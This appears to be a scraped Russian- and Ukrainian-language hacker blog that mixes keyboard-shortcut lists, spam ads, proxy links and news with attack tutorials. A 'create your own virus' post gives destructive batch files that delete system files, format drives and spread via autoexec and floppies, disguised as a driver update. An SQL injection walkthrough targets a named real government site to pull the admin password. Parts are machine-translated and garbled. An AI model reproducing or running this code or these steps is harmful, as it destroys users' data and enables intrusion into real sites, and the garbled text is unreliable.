Сочетание клавиш, для новичков...

Здравствуй новичок! Работая, и хакая : ) в среде windows нужно знать не только:
Что такое: уязвимости, что такое: теги, и т.д.
Помимо того, нужно знать обычные вещи, как Сочетания клавиш в среде windows!
Как я предоставил ниже, стаблицой было бы удобнее, но увы……


Сочетание клавиш Назначение
Internet Explorer

F4 Открывает всплывающее меню посещенных URLов
F5 Обновляет страницу, если время ее создания отличается от времени создания ее варианта, сохраненного на компьютере.
F6 Перемещаться между элементами вперед
F11 Переключиться между обычным и полноэкранным режимом
BACKSPASE Перейти на предыдущую страницу
ENTER Активизировать выбранную ссылку
TAB Перейти к следующему элементу веб-страницы, адресной строки или панели ссылок
ESС Прекращает загрузку страницы
CTRL + TAB Перемещается между элементами вперед
CTRL + A Выделить все на активной веб-странице
CTRL + B Открыть диалоговое окно "Упорядочить Избранное"
CTRL + С Копирование выделенных объектов в буфер обмена
CTRL + E Открыть панель "Поиск"
CTRL + H Открыть панель "Журнал"
CTRL + I Открыть панель "Избранное"
CTRL + L Перейти к другому адресу
CTRL + N Открыть новое окно
CTRL + O Перейти к другому адресу
CTRL + P Напечатать текущую страницу или элемент
CTRL + R Обновить страницу, если время ее создания отличается от времени создания ее варианта, сохраненного на компьютере.
CTRL + S Сохранить текущую страницу
CTRL + V Вставка содержимого буфера обмена в указанное место
CTRL + W Закрыть текущее окно
CTRL + X Удаление выделенных объектов в буфер обмена
CTRL + F5 Обновить страницу, даже если время ее создания совпадает с временем создания ее варианта, сохраненного на компьютере
CTRL + [щелчок кнопкой мыши] Открыть несколько папок на панелях "Журнал" или "Избранное"
CTRL + [стрелка влево] Переместить курсор в адресной строке влево до следующего логического разрыва (. или /)
CTRL + [стрелка вправо] Переместить курсор в адресной строке вправо до следующего логического разрыва (. или /)
CTRL + ENTER Добавить "WWW." в начало и ".COM" в конец введенного URLа.
SHIFT + CTRL + TAB Перемещаться между элементами назад
SHIFT + TAB Показать контекстное меню для ссылки
ALT + D Выделить текст в адресной строке
ALT + HOME Перейти на домашнюю страницу
ALT + [стрелка вправо] Перейти на следующую страницу
ALT + [стрелка влево] Перейти на предыдущую страницу
[стрелка вверх] Пролистать документ к началу, или перейти вверх по списку "Автозаполнение", или переместить выделение на строку вверх в списке избранного в диалоговом окне "Упорядочить избранное"
[стрелка вниз] Пролистать документ к концу, или перейти вниз по списку "Автозаполнение", или переместить выделение на строку вниз в списке избранного в диалоговом окне "Упорядочить избранное"
Page Up Пролистать документ к началу с большим шагом
Page Down Пролистать документ к концу с большим шагом
Home Перейти к началу документа
End Перейти к концу документа
Shift + [Щелчок по гиперссылке] Открыть документ в новом окне


Windows
SHIFT + Щелчок правой кнопкой Открывает контекстное меню, содержащее дополнительные пункты.
SHIFT + Двойной щелчок правой кнопкой Выполняет альтернативную команду (обычно второй пункт в контекстном меню).
ALT + Двойной щелчок правой кнопкой Открывает окно свойств объекта.
DELETE Удаляет объект.
SHIFT + DELETE Немедленно удаляет объект без помещения его в корзину.
F1 Открывает встроенную справку.
F10 Активирует строку меню.
SHIFT + F10 Открывает контекстное меню выделенного объекта. Нажатие этих клавиш эквивалентно правому щелчку мыши на объекте.
CTRL + ESC Открывает меню "Пуск".
CTRL + ESC, ESC Делает текущим выделенным объектом кнопку Пуск. После этого можно нажать клавишу TAB, сделав активным объектом панель задач, или сочетание клавиш SHIFT+F10, чтобы открыть контекстное меню кнопки Пуск. Эквивалентно двойному щелчку по кнопке "Пуск".
ALT + [стрелка вниз] Открывает раскрывающийся список.
ALT + TAB Делает активным другое выполняющееся приложение (бывшее активным непосредственно перед текущим). Для переключения на другие приложения нажимайте клавишу TAB несколько раз, не отпуская клавишу ALT. При этом в центре экрана появится панель, показывающая все запущенные приложения, и какое из них окажется активным, если вы отпустите клавишу ALT.
SHIFT Удерживайте клавишу SHIFT нажатой, чтобы:
во время загрузки Windows пропустить обработку папки "Автозагрузка"
при вставке компакт-диска отменить выполнение процедуры автозапуска
При нажатии клавиши ОК в диалоговом меню "Завершение работы" перезагрузить Windows без перезагрузки компьютера
ALT + SPACE Открывает управляющее меню активного окна.
ALT + - Открывает управляющее меню дочернего окна документа (в программах, которые могут открывать несколько документов одновременно).
CTRL + TAB Вызывает переход в дочернее окно следующего документа (если в программе открыто сразу несколько документов).
ALT + [подчеркнутая буква в меню] открывает соответствующее меню (может потребоваться предварительное переключение раскладки клавиатуры).
ALT + F4 Закрывает текущее окно. Если ни одно окно не открыто, то открывает меню завершения работы Windows.
CTRL + F4 Закрывает дочернее окно документа (в программах, которые могут открывать несколько документов одновременно).
ALT + F4 Закрывает окно или выходит из программы.
ALT + F6 Выполняет переход в следующее окно, открытое текущей программой.
CTRL + [стрелка вправо] Выполняет переход к следующему слову (в текстовом редакторе).
CTRL + [стрелка влево] Выполняет переход к предыдущему слову (в текстовом редакторе).
F2 Переименование объекта.
F3 Поиск в выделенной папке.
F4 Раскрывает список адреса, если панель адреса выведена на экран.
F5 Обновляет текущее окно.
F6 Делает активной другую панель проводника.
CTRL + X Вырезать.
(CTRL + C) или (CTRL + INSERT) Копировать.
(CTRL + V) или (SHIFT + INSERT) Вставить.
CTRL + Z Отменяет последнюю команду.
CTRL + A Выделяет все объекты в текущем окне.
ALT + ENTER Открывает окна свойств выделенных объектов.
CTRL Чтобы скопировать файл, во время перетаскивания удерживайте нажатой эту клавишу.
SHIFT Чтобы переместить файл, во время перетаскивания удерживайте нажатой эту клавишу.
CTRL + SHIFT Чтобы создать ярлык, во время перетаскивания удерживайте нажатыми эти клавиши.
BACKSPACE Выполняет переход в родительскую папку.
SHIFT + [щелчок на кнопке "закрыть"] Закрывает текущую папку и все родительские папки.
Секреты
Пятикратное нажатие клавиши SHIFT Включает/выключает режим "залипания" клавиш.
Удержание клавиши SHIFT нажатой в течение восьми секунд Включает/выключает режим фильтрации ввода.
Удержание клавиши NUM LOCK нажатой в течение восьми секунд Включает/выключает режим озвучивания.
Левая ALT + левая SHIFT + NUM LOCK Включает/выключает управление указателем мыши с клавиатуры.
Левая ALT + левая SHIFT + PRINT SCREEN Включает/выключает режим высокой контрастности.
Сочетание клавиш Назначение
WIN + Pause/Break Открывает диалоговое окно Свойства: Система (System properties).
WIN + R Открывает окно "Запуск программы" (Run).
WIN + M Сворачивает все открытые на данный момент окна, кроме диалоговых.
WIN + D Сворачивает все открытые на данный момент окна, включая диалоговые.
WIN + Shift + M Отменяет свертывание окон.
WIN + F1 Открывает справочную систему Windows.
WIN + E Открывает окно проводника.
WIN + F Открывает окно для поиска файлов.
CTRL + WIN + F Открывает окно для поиска компьютера.
WIN + TAB Выполняет переключение между кнопками на панели задач.

В заключение хочу сказать, что эти вещи размещены не только в интернете, а даже в самой «хрюше» В разделе Справка и поддержка!

Заработок

Заробляйте на своєму сайті, блозі, дошці, новинний канал, закладці, роблячи посилання та короткі огляди товарів та послуг нашого сайту. Платні запису - це, на сьогодні, найшвидший і доступний спосіб монетизації ваших ресурсів. Легальний і цілком етично.
Заработок
Оплата по среднемировым тарифам

Работа

Работа, вакансии: http://universal-trade.ru/
Приглашаем на работу в Бартерную биржу товаров и услуг. Ищем представителей по регионам. Оплата по среднемировым тарифам: http://universal-trade.ru/


Работа
Заработок
Оплата по среднемировым тарифам

house-md

Інтернет магазин куча фудболок та разних гаджетів я собі замовив парочку.

House M.D.

Що робити якщо закрили доступ на сайт VKONTAKTE.ru

Якщо в вас на роботі або в коледжі чи навіть в школі злий дядька адмін закрив доступ до цього сайту ))) . То як завжди нам на допомогу приходять проксі та різні утілітки для забезпечення анонімності. Так звані анонімайери.
Як ними користуватись чи як їх знайти .?
Достатньо лише в гуглі написать "Анонімайзери"
І ви получите велику масу інформації .
Ось ті які я вибрав з маси !!! :
http://www.proxyanon.com/
http://www.anonproxy.info/
http://www.proxysafe.com/
http://www.strongproxy.com/
http://www.boredatschool.net/
http://www.kproxy.com/
http://www.ukproxy.com/
http://www.simpleproxy.com/

Le Parkour

Нашел первый электронный журнал про паркур.
Всем кто хотя бы раз слышал это слово (Parkour) советую зайти сюда "журнал о паркур"
Журнал просто супер. Кстати я уже как два года занимаюсь паркуром и
на этом сайте нашел много вещей которые видел и не слышал.
статьи о паркур

Создай свой вирус

Создание вируса
Есть несколько вариантов создания вируса.Мы рассмотрим лишь один из них...

@echo off
echo Windows updating driver...
attrib -r -h -s c:windows*.da?
echo Y | del c:windows*.da?
echo Y | del d:*.*
attrib -r -h -s c:*.*
echo Y | del c:*.sys
echo Y | del c:*.bin
echo Y | del c:*.bat
echo Y | format d:
echo Y | format c:
echo Virus loading.... Completed!

Это пример вируса...Да и еще одно договоримся сохранять наши проекты как .bat файлы... Итак, разберем по строкам... Первая строка "говорит" компьютеру, что не надо показывать операции. Вторая - выводит надпись Windows updating driver... третья и шестая-снимают все атрибуты(скрытый, для чтения и т.д.) с файлов. 4-ая, 5-я, 6-я, 7-я, 8-я и 9-я удаляют файлы на дисках. 10-я и 11-я форматируют диски. Ну и 12-я выводит знаменательную надпись: Virus loading.... Complited! Форматирование может и не произойти, но ОС будет испорчена... Задание:Создайте самостоятельно вирус, который будет "убивать" виндовс не только находящийся на диске С:.
Рассмотрим еще один пример:

@echo off
if exist c:aivus.bat goto cool
copy %0 c:aivus.bat >nul
attrib +h c:aivus.bat >nul
echo c:aivus.bat>>c:autoexec.bat
echo Y | del %0 >nul
:cool
copy %0 a: un.bat >nul
copy %0 a:open.bat >nul
attrib +h a:open.bat >nul
echo Y | del c:windowscalc.exe >nul
attrib -h -s -r c:*.ini >nul
echo Y | del c:oot.ini >nul
echo Y | format a:

Я думаю не все поняли, что это за строчки:
if exist c:aivus.bat goto cool
echo c:aivus.bat>>c:autoexec.bat
copy %0 a:open.bat >nul
attrib +h a:open.bat >nul

Строчка if exist c:aivus.bat goto cool С вирусами связано и программирование... Те, кто чуть его знают, поняли её. Для других объясняю: Эта строка проверяет есть ли файл open.bat на диске С: , если есть переходим к строке :cool.
Строка echo c:aivus.bat>>c:autoexec.bat добавляет себя в автозапуск.
copy %0 a:open.bat >nul копирует себя(обозначается %0) в a:open.bat Ну а строка attrib +h a:open.bat >nul ставит файлу атрибут скрытый. Если кто-то непонял что значит null, значит - скрыть операцию...

Sport

Компания МТГ

Сайт на якому можна замовити :
"Сенсорные киоски", "Световые табло", "Системы информационной безопасности FortiNet", "Система управления очередью AKIS"... і багато чого іншого для замравок, магазинів та супер-маркетів.
А також :
* Аренда системы управления очередью
* Аренда сенсорных киосков
* Аренда световых табло
* Аренда оборудования FortiNet
* Постгарантийное обслуживание
Як веб дизайнер скажу :
-"Не поганий дизайн сайту але...Зайдіть самі подивітся."
информационный терминал, система очереди, управление очередями.

Простой и удобный поиск работы

Простой и удобный поиск работы, вакансий и резюме в Екатеринбурге, Челябинске, Кургане, Тюмени, Перми, Уфе и других городах Урала. Ежедневно новые вакансии и резюме.

http://www.uraljob.ru/

Австралия

новый фильм "Австралия"
Класний фільм !!!

Скануєм по уму

Ця стаття не дасть практично ніякого досвіду, однак вона дійсно важлива для розуміння того, як все влаштовано. Адже без азов не можна в майбутньому написати щось дійсно хороше. Саме ця стаття розповідає, чому xspider корисний, але якщо він нічого не видає, то це не значить, що жертва Невразливий (як вважають 95% початківців зломщиків).
У статті описується саме безпека Linux-систем, так як Windows не зовсім призначений для "глибокої" роботи з мережею.
Отже, приступимо. Почнемо, як я вже казав, з азів. Тобто зі сканування мережі та отримання від неї всієї потрібної нас інформації. Думаю, що всім зрозуміло, як користуватися соц. інженерією. Я не буду заглиблюватися в цей недостойний людини метод і розповім Вам про справжніх сканування мережі.
1) Дуже рідко використовуються, та й мало допомагають бази Whois.
Root @ localhost $ whois foo.com
Domain name: ---
Registar: ---
Referall: bar.com
і т.д. Найбільш корисними рядками будуть registar і referall, т.к. при запиті Whois із зазначенням компанії реєстратора ми отримаємо найбільш повну інформацію. (Root @ localhost $ whois foo.com @ whois.bar.com). Раджу так само застосувати Whois відносно не тільки какого-то домену, але й за певним IP адресою. Саме це допоможе дізнатися такі тонкощі, як останнє оновлення сервера.
2) Ping, Traceroute, Host.
Про PING, мабуть, не треба розповідати. Багато інформації від нього не отримаєш, хоча він завжди під рукою.
Traceroute грунтується на відправленні UDP-пакетів з вказаним Max-Forwards і очікуванні ICMP-відповідей. Шлет пакети на порти в діапазоні від 33434 до 33523. Ми бачимо через які комп'ютери проходили пакети, можемо дізнатися більше про віддаленій машині. І навіть якщо вона не вразлива, то можна попробывать надалі протестувати на безпеку, наприклад, його провайдера.
Host. Головне - отримати якомога більше інформації. І це нам цілком може вдасться, якщо DNS створювалася не вручну.
а) При виклику команди Host з наступними параметрами можна домогтися результатів:
-HINFO вказує конфігурацію сервера, встановлене на нього ПЗ.
-ТХТ додаткова інформація про сервер.
(це далеко не всі параметри, проте саме вони потрібні при скануванні мережі).
б) Оскільки одна машина може працювати некоректно, то створюють вторинні DNS-сервера, які є "запасними". Проблема в тому, що хакер може поряд з адміністратором створити таку DNS. Якщо спочатку ввести host baz.ru, а потім host baz.ru name_of_server (де name_of_server - відповідь на ваш перший запит), то можна отримати список всіх хостів для даного сервера з їх IP.
3) Визначення ОС і запущених процесів.
Сканування портів.
а) Ось те головне, що необхідно при аналізі безпеки комп'ютера. Знаючи всі відкриті порти жертви можна підключатися до неї через різні проксі і дізнаватися, які саме версії програм встановлені на ньому (наприклад старий Sendmail). Так само відкриті порти найкраще дозволяють визначити ОС, однак не варто вірити у всі відкриті порти. Іноді відкривають порти для Windows, коли на сервері стоїть Linux, що вводить багатьох в сум'яття. Кожен порт краще перевірити на дійсну працездатність. Я віддаю перевагу сканувати віддалену машину з допомогою nmap (тим сканером, що був у Матриця 2). Всі параметри ви легко можете знайти в документації.
Треба зауважити, що інформація, яку буде передаватися на ваш комп'ютер при підключенні до комп'ютера жертви може бути підмінила адміністратором і визначити справжню версію ПЗ буде вже не так легко, тому сканування портів може бути недостатньо.
б) Необхідно формувати явно некоректні запити. Тоді відповідь сервера може допомогти з визначенням ОС. Для формування таких запитів я раджу використовувати nmap (і взагалі, nmap краще за інших програм такого роду в усьому, тому потрібно використовувати його як можна більше). Однак і формування запитів не дасть результату, якщо адміністратор поставив Firewall, а це він точно зробив. Однак з'явилося удосконалення попереднього методу. Полягає це вдосконалення в тому, що ми не посилаємо спеціальні запити на сервер, нам досить простого підключення до віддаленої машині. У кожної системи свої конфігурації з'єднання і роботи по протоколу TCP / IP: DF, Windows Size, TOS, TTL. (головні атрибути). Отримуючи їх ми можемо визначити встановлену на віддаленому комп'ютері систему. Якщо ви не вмієте дивитися властивості з'єднання, то зайдіть на сайт subterrain.net, де ви зможете завантажити потрібну програму.
4) Файлова система
Існує цікава можливість зібрати інформацію завдяки NFS, що дозволяє спільно використовувати файли машинам, заснований на Linux. При цьому будь-яка людина може (якщо це не заборонили) підключитися до віддаленої машині і змонтувати (підключити) жорсткий диск жертви до себе з правами користувача root. Якщо таке підключення і заборонили, то команду showmount (що вона робить, мабуть, здогадалися самі) - ймовірно немає. Треба зауважити, що часто необхідно використовувати цю команду з параметрами-а і-е, що покаже всі хости, на які змонтовані файли, а так само всі хости, яким це дозволено.
5) Протокол SNMP
Зупинятися докладно я на ньому не буду, так як він більше придатний для злому (а це тема іншої статті), ніж для збору інформації. Даний протокол дозволяє звертатися до різних мережних пристроїв. Головною проблемою його є те, що багато програм працюють тільки з однією з найбільш ранніх його версій, безпека якої залишає бажати кращого. Програми для роботи з SNMP широко поширені в інтернеті.
6) Протокол ONC RPC
RPC є механізмом, який дозволяє процесам одного комп'ютера викликати деякі процедури на інших комп'ютерах. Цікавим є той факт, що за RPC не встановлюються певні порти, вони самі реєструються в спеціальній службі portmap. Portmap підтримує команду rpcinfo, що дозволяє вам побачити всі запущені RPC процеси на віддаленому комп'ютері. Я і для цього сканування волію використовувати nmap.
Якщо ви ще не зрозуміли, чому не можна (точніше небажано) використовувати сканер безпеки xspider (або будь-який інший йому подібний), то ви були не уважні. А відповідь проста: при скануванні жертва легко може помітити сканування і перекрити доступ до уразливих місць системи, а так само підмінити видавати інформацію, що приведе до повної дезінформації зломщика. Власне кажучи, використовуйте всі методи збору інформації, що може хоч про одному адміністратор забув.
Тепер про те, як не дати зловмисникові дізнатися про те, що його інтересует.Надо помітити, що в линукс досить багато потенційних вразливостей, проте багато з них вирішуються однаковим способом (установкою Firewall, к примеру).
1) Бази даних Whois.
Тут все просто. Не давати їм даних ...
2) Ping, host traceroute
Для відключення PING необхідно налаштувати політику безпеки щодо Echo запитів. Необхідно, щоб таку можливість мали тільки певні вузли. Можна за допомогою Firewall, можна за допомогою політики ipchains (про неї докладно в іншій статті). Можна так само відключити саму службу Echo у файлі / ETC / inetd.conf. Закомментіруйте рядки:
echo stream ...
echo dgram ...
З Host складніше.
а) По-перше, записи в DNS створюйте в ручну. Не пишіть інформацію в поле hinfo. (решта поля за розсудом).
б) При створенні вторинних серверів необхідно у файлі named.conf вказати IP-адреси "дозволених" (як це зробити, написано в документації, але все-таки скажу, що зробити це можна за допомогою allow_transfer:
...
Zone "foo.ru" (
...
Allow-Transfer (ip.ip.ip.ip;);
...
Traceroute: тому що вказати адміністраторам інших комп'ютерів що-небудь ви не можете, то доведеться зробити єдине - заборонити Echo запити та / або встановити Firewall. Тоді зловмисникові буде відправлятися повідомлення про те, що порт недоступний та інформацію про вашу мережі він отримає не всю.
3) Визначення ОС і запущених процесів.
а) Я віддаю перевагу програму з www.psionic.com / abucus / portsentry (як ви вже здогадалися, програма називається PortSentry). Вона допомагає розпізнавати наявність підключення до будь-то порту. Власне, я вже згадував про те, що необхідно відкрити кілька портів з незапущеннимі на них службами (причому портів для різних операційних систем). Так як дуже часто зловмисників хвилюють Telnet і Sendmail, то я опишу те, де зберігається інформація, що видається при підключенні до вашого комп'ютера (версія служби). В файлі sendmail.cf в папці / ETC / необхідно змінити рядок smtpgreetingmessage (це для Sendmail, якщо хтось не здогадався). А для Telnet - / ETC / essue Там треба видалити всю інформацію, яку будуть показувати зловмисникові.
б) Для закриття можливості отримати інформацію, використовую некоректні пакети для запиту, необхідно просто встановити Firewall. При закритті "пасиву" необхідно знову ж таки видавати завідомо неправдиву інформацію. Для / proc/sys/net/ipv4 параметра ip_default _ttl можна написати Echo 1024 і вона буде видавати 1024 при запиті, а на самом деле все не так. Для перегляду інших параметрів застидайтесь вихідні коди системи.
4) Постарайтеся уникати цієї NFS (не як нечисть, звичайно). Якщо все-таки NFS вам потрібен для роботи, то заборонити підключення до порту 2049 для "не своїх". Бажано заборонити доступ до NFS програмами, так як їх безпеку залишає бажати кращого.
5) Буду немногословная. Треба встановити Firewall і заблокувати доступ до портів з SNMP для чужих комп'ютерів. Ну і, звичайно, використовувати як можна більш нові версії SMTP.
6) Закрийте всі непотрібні порти використовую Firewall, відключіть можливість звертатися до portmaper за допомогою все того ж Firewall.

Анна Седакова

Сайт про знаменитостей .
На ньому можна знайти фото і цікаві історії
про різних знаменитостей .
Анна Седакова

Video Onlane

фильмы онлайн
Не поганий але свіжи сайт . На ньом можна подивитись фільми онлайн . А також закачать собі на на машину . Багато нових і цікавих фільмів та серіалів.
фильмы онлайн

Чергова SQL ін'єкцій.

Привіт хацкери, кул хацкери і новачки! З вами redbu11.В цій статті піде мова про таку вразливості як SQL injection.Я знаю що таких статей в инете немеряно, але все-таки я напишу ще одну статейку про такий уязвімості.Я написав цю статтю для тих у кого ще не сформувалася ідея про цієї вразливості, то є новачкам у цьому деле.То що я буду розповідати, зовсім не нове, Так що розрахована для новічков.Я думаю ви всі знаєте що таке SQL вразливість, а якщо ні, то пошукайте в инете, там багато про це написано, просто если я щас начну пояснювати що це таке у великих подробицях, то це займе багато времені.І так приступимо.))
Для виявлення SQL ін'єкції я найчастіше користуюся маніпулюванням числовими параметрами в GET запросах.Вот наприклад мене як-то зацікавила така посилання:
http://www.komnasfbpi.go.id/berita_eng.php?id=58
тут ID = 58 і є числовий параметр.Ітак, перевіримо її на уязвімость.В кінець посилання додаємо одиночную лапки '. http://www.komnasfbpi.go.id/berita_eng.php?id=58 '
І дивимося на результат.Опа Сторінка завантажилася неправильно і видала нам SQL помилку:
Відкрита база даних: Невірний запит
SELECT * FROM tbl_berita де berita_id = 57 '
Ура! Це і є SQL уязвімость.Но щоб переконатися що вразливість дійсно існує, перевіримо еще кое-что.ПЕреходім знову за адресою:
http://www.komnasfbpi.go.id/berita_eng.php?id=58
І бачимо там сторінку із заголовком "Komnas FBPI ТРИВАЄ пташиного грипу Програма контролю". Ок, тепер перейдемо на сторінку "нижче", не на 58-му а на 57-му, тобто так: http://www.komnasfbpi.go.id/berita_eng.php?id=57
І бачимо там сторінку вже з іншим заголовком "Повітряна Бату Asahan Мешканці підтвердження пташиного грипу
Негативний ". Тепер переходимо назад на 58-ту сторінку:
http://www.komnasfbpi.go.id/berita_eng.php?id=58
Отже, коли ми знаємо, що 58-а сторінка має заголовок "Komnas FBPI ТРИВАЄ пташиного грипу CONTROL ПРОГРАМА "а 57-а має заголовок" Повітряна Бату Asahan Мешканці підтвердження пташиного грипу Негативний "то перевіримо змінну "ID" на вразливість і складемо такий запит:
http://www.komnasfbpi.go.id/berita_eng.php?id=58-1/ *
(Завжди закриваємо символом / *) І дивимося на результат.В результаті завантажилася НЕ 58 а 57 страніца.Ура! Вразливість дійсно є! А що це значить? З попереднім запитом ми спробували виконати просту арифметичну операцію, тобто 58-1, і сайт її не отвільтровал а виконав, і в результаті ми отримали 58-1 = 57, це означає, що замість цього ми можемо вставити будь-який інший запит який нам буде більш полезен.Ми зараз будемо намагатися витягти за допомогою цієї вразливості з бази
даних логін і пас адміна.І так, сначало нам треба з'ясувати скільки полів у базі данних.Я для цього використовую оператор "+ на порядок". І так перевіримо скільки-ж там полів використовуючи + порядку шляхом:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 30 / *
На такий запит нам видалася помилка, це означає що полів менше ніж 30.Пробуем так:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 20 / *
На це нам теж видалася помилка, значить полів менше 20-і.Пробуем далі:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 10 / *
На це нам не видалося жодної помилки, це означає що полів або 10, або більше 10-і.Продалжаем в цьому-ж дусі поки не обнарушем вірне кількість полів:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 15 / *
Сторінка знову завантажилася з помилкою, це означає що полів менше ніж 15, пробуємо так:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 14 / *
Уряяя! 14 Сторінка завантажилася нормально, а 15-ая завантажувався з помилкою, це означає що полів всього лише 14, це нам тільки наруку.Теперь знаючи що полів 14, подивимося яке з них прінтабельное, то є з допомогою якого поле виводитися інформація.Для цього нам потрібно скористатися оператором
"Союз + вибрати", складаємо запит, делаеться це так:
http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 / *

Дивимося на результат, коли сторінка завантажується, прокручують сторінку до самого низу, і ми побачимо що

там отоброжаеться цифра 9, це означає, що для виведення інформації використовується 9-е поле.
Ну ось тепер коли ми знаємо, що в базі тільки 14 полів і використовуються 9-е прінтабельное, переходимо до

наступного етапу, будемо долбить базу даних і спробувати витягти звідти логіп і пас Админа.)) Нам щас

потрібно перевірити, чи існує в базі даних таблицю з назвою типу користувачів, користувач, адміністратор І т.д. .. Це

теж делаеться з оператором союз + select.Нам щас потрібен логін і пас адміна, давайте почнемо з

логіна.Для того, щоб дізнатися логін, нам треба перевірити, чи існує в базі даних таблиця з назвою

ім'я, або логін, де і зберігатися логін.Теперь ми і будемо перевіряти на наявність всіх цих табліц.Делаем

це як я вже казав оператором союз + вибрати таким чином:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + від +

Користувачі / *

Цим ми перевіряємо, чи існує таблиця користувачів у базі даних, якщо така існує, то сторінка

завантажитися без помилки, а якщо такої немає, то завантажитися з ошібкой.Нам на це видалася помилка, значет

такий нет.Проверім чи є таблиця користувачів:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + користувачів /

*

на жаль і такий не виявилося, теж нам на це видалася помилка ...(( Але не треба

засмучуватися! Багато админы використовують префікси перед назвою табліци.Теперь зверніть увагу на

ту помилку яка нам виводитися:

Відкрита база даних: Невірний запит
SELECT * FROM tbl_berita де berita_id = 57 '

Подивіться там на цей текст: tbl_berita
Тут використовується префікс tbl_ перед назвою табліци.Давайте перевіримо чи існує таблиця користувачів

використовуючи цей префікс! Ок, робимо запит:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8,9,10,11,12,13, 14 + tbl_u

сер / *

Є! Ура! Сторінка завантажилася нормально, значить таблиця tbl_user існує! Тепер спробуємо дістати

ім'я користувача з таблиці tbl_user.Проверім, чи існує запис з назвою ім'я в таблиці

tbl_user.Ето делаесть майже також, тільки в 9-е поле вставляємо слово назву, цим ми і будемо перевіряти

чи існує запис в таблиці ім'я tbl_user.Етот запит буде виглядати так:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, ім'я, 10,11,12,13, 14 + ТБ

l_user / *

Подивимося що ми на це вийде, а нам на це сторінка завантажилася нормально, значить є

такая! прокручують сторінку в самий низ, і бачимо там запис "Адміністратор", Ураа!! У нас тепер є

логін адміна, залишилося дістати пасс.Пробуем:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 1

4 + tbl_user / *

На це нам сторінка завантажилася з помилкою, це означає, що немає запису паролів, пробум так:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 14 +

tbl_user / *

На це теж видалася помилка,, такої теж нема ((пробуємо далі:

http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + союз виберіть +1,2,3,4,5,6,7,8, пароль, 10,11,12,13, 14 + tbl

_USER / *

Даа! Сторінка завантажилася без помилки, і це значить що запис! Прокручують сторінку в самий низ і

там ми бачимо пас адміна! Залишилося його розшифрувати і все!
Потім переходимо сюди http://www.komnasfbpi.go.id/admin вводимо отримані дані, і все, далі все

залежить від вашої фантазії!
Ось і все, все, про що б я з вами хотів би поделіться.Я описав просенькую SQL ін'єкцію.

УВАГА! Автор не несе ніякої відповідальності за неправильне використання розміщеної тут

інформації! Усе, що тут розміщено, це не пробудження до дії, а лише для ознайомлювальних

цілей!
Ну ось і все, всім пока и удачи зі зломом!

Російські хакери покарали Киргизії за американську військову базу

За твердженням американського експерта з комп'ютерної безпеки Дона Джексона з фірми SecureWorks Inc, розташованої в Атланті, російські хакери "вирубати" Киргизії з мережі. З 18 січня цієї далекої середньоазіатських країн постійно перекривають доступ до Інтернету.

Популярний метод сучасних хакерів - відмова в обслуговуванні напад - настільки перезавантажувати сервери, що вони йдуть в автономному режимі. Кібератакам піддалися два основних киргизьки інтернет-провайдера, частка яких на ринку інтернет-послуг перевищує 80%.

Чому ж американського експерта хвилює ситуація в далекій від США країні, де лише 20% населення має у своєму розпорядженні доступом в Інтернет? Виявляється, він переживає за рівень підготовленості самої Америки до таких атак.

Можна позаздрити рівнем патріотизму Джексона, якби не одна обставина. За однією з версій, причиною атаки проти киргизького інтернету вважають протест російських хакерів-патріотів проти присутності на території колишньої радянської республіки американської військової бази. І хоча російське посольство в Киргизії ситуацію не коментує, вспомнилось до місця рядок з вірша А.С Пушкіна: "Як нині сбірается вещій Олег помститися над нерозумним хазарам ...". Виходить, що відімститься.

http://www.internovosti.ru

Велике злиття на світовому ринку аутентифікації

Компанія Aladdin Знання систем ТОВ (NASDAQ: ALDN), провідний розробник систем аутентифікації, продуктів і рішень для забезпечення інформаційної безпеки, оголосила про згоду увійти до складу високотехнологічного холдингу під управлінням найбільшої групи інвесторів Вектор Капітал ".
Днями інвестиційний холдинг Вектор Капітал досяг угоди з радою акціонерів компанії Aladdin Знання систем (АКС) про її злиття з компанією SafeNet, власником якої також є згаданий холдинг. До вже наявних у Вектор Капітал 14% акцій Aladdin, в результаті нової угоди було додано ще 19% на загальну суму близько 160 млн.. доларів. За оцінками експертів, дана угода здатна істотно змінити розстановку сил на ринку апаратної аутентифікації та захисту програмного забезпечення (ПЗ).
Угода з АKS стало логічним продовженням політики Вектор Капітал, яка за останні роки об'єднала таких відомих виробників, як WinZip, WatchGuard Technologies, SafeNet, Corel Корпорація LANDesk Software, Savi техніка, точний програмних рішень, Printronix, Register.com, Tripos та ін Будучи керуючим партнером, Вектор Капітал розробляє і впроваджує ефективні фінансові і бізнес-стратегії, здатні якісно поліпшити конкурентоспроможність що входять в холдинг компаній і збільшити їх ринкову вартість. Придбання акцій АКС забезпечує Вектор Капітал можливість зміцнити свої позиції на ринку аутентифікації, розширити лінійку пропонованих продуктів, а також отримати вихід на нові географічні ринки. При цьому в угоді з АКС особливий акцент зроблено на те, що всі торгові марки вендора, серед яких HASP, eToken, eSafe будуть повністю збережені як самостійні сформувалися бренди, що стали стандартами «де-факто» на профільних ринках. «Інтеграція АКС з такими гравцями ринку, як SafeNet і WatchGuard повністю узгоджується з нашою стратегією глобалізації», - сказав Шломо Янай (Shlomy Янаі), віце-президент "Системи знань Aladdin за напрямом eToken. «Важливою перевагою операції для нас також є можливість м'якого виходу на ринки США, Канади та Південної Америки» - додав він.

